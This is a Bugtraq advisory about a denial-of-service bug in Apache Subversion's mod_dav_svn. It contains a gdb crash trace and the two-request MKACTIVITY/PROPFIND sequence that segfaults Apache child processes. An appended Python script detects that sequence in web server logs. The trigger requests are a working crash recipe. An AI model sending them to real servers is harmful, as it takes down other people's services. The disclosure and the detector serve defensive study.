Thursday, 7 March 2013

Apache Subversion mod_dav_svn DoS via MKACTIVITY/PROPFIND

Bugtraq mailing list archives

Apache Subversion mod_dav_svn DoS via MKACTIVITY/PROPFIND
From: tytusromekiatomek () hushmail com
Date: Tue, 05 Mar 2013 20:48:23 +0000

#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and few others

(gdb) where
#0  0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1  0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2  0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3  0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4  0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5  0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6  0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7  0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8  0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9  dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax            0x7fff6e97e1e0   140735048835552
rbx            0x7fff6e97e1a8   140735048835496
rcx            0x7f2590df7028   139799321079848
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff6e97dec8   140735048834760
rbp            0x3      0x3
rsp            0x7fff6e97de78   0x7fff6e97de78
r8             0x7f2596833ee0   139799415701216
r9             0x1      1
r10            0x1      1
r11            0x1      1
r12            0x4e24   20004
r13            0x7f2590e08028   139799321149480
r14            0x7fff6e97dff0   140735048835056
r15            0x7f2590df7028   139799321079848
rip            0x7f2595db9d60   0x7f2595db9d60 <svn_fs_file_length>
eflags         0x246    [ PF ZF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov    0x30(%rsi),%rax
(gdb) x/x $rsi
0x0:    Cannot access memory at address 0x0

Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs).

-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --

EOF
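Added here as a defender's example, not part of the Bugtraq post above: a Python script that scans constructed Apache access-log lines for the two-request sequence the advisory describes (a PROPFIND against a !svn/act/ activity resource, flagged more strongly when the same client created that activity with MKACTIVITY earlier) and counts child segfault notices in a constructed error_log excerpt, since a child that dies with SIGSEGV often never writes its own access-log line. The log formats are the stock httpd combined and prefork notice formats; that ordinary svn clients do not PROPFIND activity resources is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample input (not from the advisory): Apache combined-format access-log lines.
ACCESS_LOG = """\
10.0.0.5 - - [05/Mar/2013:20:40:01 +0000] "MKACTIVITY /egg/!svn/act/foo HTTP/1.1" 201 0 "-" "curl/7.26.0"
10.0.0.5 - - [05/Mar/2013:20:40:02 +0000] "PROPFIND /egg/!svn/act/foo HTTP/1.1" 500 0 "-" "curl/7.26.0"
10.0.0.9 - - [05/Mar/2013:20:41:10 +0000] "MKACTIVITY /egg/!svn/act/ab12 HTTP/1.1" 201 0 "-" "SVN/1.6.17"
10.0.0.9 - - [05/Mar/2013:20:41:11 +0000] "CHECKOUT /egg/!svn/ver/3/trunk HTTP/1.1" 201 0 "-" "SVN/1.6.17"
10.0.0.9 - - [05/Mar/2013:20:41:12 +0000] "DELETE /egg/!svn/act/ab12 HTTP/1.1" 204 0 "-" "SVN/1.6.17"
10.0.0.7 - - [05/Mar/2013:20:42:00 +0000] "PROPFIND /egg/!svn/act/zzz HTTP/1.1" 404 0 "-" "curl/7.26.0"
"""
# Constructed error_log excerpt in the stock httpd prefork notice format.
ERROR_LOG = """\
[Tue Mar 05 20:48:20 2013] [notice] Apache/2.2.22 (Debian) configured -- resuming normal operations
[Tue Mar 05 20:48:23 2013] [notice] child pid 4093 exit signal Segmentation fault (11)
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ACT_RE = re.compile(r'/!svn/act/[^/?#]+$')   # mod_dav_svn activity resource URL
SEGV_RE = re.compile(r'child pid \d+ exit signal Segmentation fault')

def find_activity_propfinds(access_log_text):
    """One dict per PROPFIND aimed at a !svn/act/ activity resource.
    'after_mkactivity' is True when the same client created that activity
    earlier in the log, i.e. the exact two-request sequence in the advisory."""
    created = defaultdict(set)   # client ip -> activity paths it MKACTIVITY'd
    hits = []
    for line in access_log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not ACT_RE.search(m['path']):
            continue
        ip, path = m['ip'], m['path']
        if m['method'] == 'MKACTIVITY':
            created[ip].add(path)
        elif m['method'] == 'PROPFIND':   # reported even if the activity never existed
            hits.append({'ip': ip, 'path': path, 'status': int(m['status']),
                         'after_mkactivity': path in created[ip]})
    return hits

def count_child_segfaults(error_log_text):
    """Count worker children that died with SIGSEGV. A crashed child often
    never writes its access-log line, so error_log is the corroborating signal."""
    return sum(1 for line in error_log_text.splitlines() if SEGV_RE.search(line))

if __name__ == '__main__':
    for hit in find_activity_propfinds(ACCESS_LOG):
        print(hit)
    print('child segfaults:', count_child_segfaults(ERROR_LOG))
```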


Source: http://seclists.org/bugtraq/2013/Mar/29

